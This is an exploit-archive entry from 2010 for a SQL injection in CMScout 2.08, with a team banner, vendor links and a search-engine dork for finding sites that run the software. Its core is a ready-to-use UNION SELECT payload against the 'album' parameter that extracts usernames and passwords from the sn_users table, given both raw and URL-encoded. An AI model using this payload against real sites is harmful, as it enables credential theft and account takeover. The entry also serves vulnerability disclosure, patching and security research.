CMScout 2.08 - SQL Injection

EDB-ID:

12407


Platform:

PHP

Published:

2010-04-26

# Title: CMScout 2.08 SQL Injection Vulnerability
# EDB-ID: 
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Dr.0rYX and Cr3w-DZ
# Published: 
# Verified: 
# Download Exploit Code
# Download N/A

  NNNN      NNNN        AAAAAA          SSSSSSSS      TTTTTTTTTTTT                                                
  NNNNNN    NNNN        AAAAAA        SSSSSSSSSSSS    TTTTTTTTTTTT                                                
  NNNNNN    NNNN      AAAA  AAAA      SSSS                TTTT          eeeeee        aaaaaa      mmmm  mm  mmmm  
  NNNNNNNN  NNNN      AAAA  AAAA      SSSSSSSSSS          TTTT        eeee  eeee    aaaa  aaaa    mmmmmmmmmmmmmmmm
  NNNN  NNNNNNNN    AAAA      AAAA        SSSSSSSS        TTTT        eeeeeeeeee        aaaaaa    mmmm  mmmm  mmmm
  NNNN    NNNNNN    AAAAAAAAAAAAAA            SSSS        TTTT        eeee          aaaa  aaaa    mmmm  mmmm  mmmm
  NNNN    NNNNNN    AAAAAAAAAAAAAA    SSSSSSSSSSSS        TTTT        eeeeeeeeee    aaaa  aaaa    mmmm  mmmm  mmmm
  NNNN      NNNN  AAAA          AAAA    SSSSSSSS          TTTT          eeeeee      aaaaaaaaaa    mmmm  mmmm  mmmm




                                ALGERIAN HACKER
  **********************- NORTH-AFRICA SECURITY TEAM -***********************
 
[!] Title     :  CMScout 2.08 SQL Injection Vulnerability
[!] Author    : Dr.0rYX and Cr3w-DZ
[!] MAIL      : vx3@hotmail.de  &  Cr3w@hotmail.de
 
***************************************************************************/
 
[ Software Information ]
 
[+] Vendor   : http://www.cmscout.za.net/
[+] script   : CMScout 2.08
[+] Download : http://www.cmscout.co.za/index.php?page=downloads&menuid=9
[+] Vulnerability : php SQL injection
[+] Dork :Powered by CMScout (c)2005 CMScout Group

 
**************************************************************************/
[ Vulnerable File ]
 
http://server/index.php?page=photos&album=[N.A.S.T ]
 
[ Exploit ]
 
http://server/index.php?page=photos&album=-1+UNION+ALL+SELECT+1,concat(uname,0x3a,passwd),3,4,5+from+sn_users--
 
 
 
[ Example  ]
 
http://[site]/index.php?page=photos&album=-1+UNION+ALL+SELECT+1,concat%28uname,0x3a,passwd%29,3,4,5+from+sn_users--
 
[  Greets ]
 
[+] :CLAW , exploit-db.com,all my friends....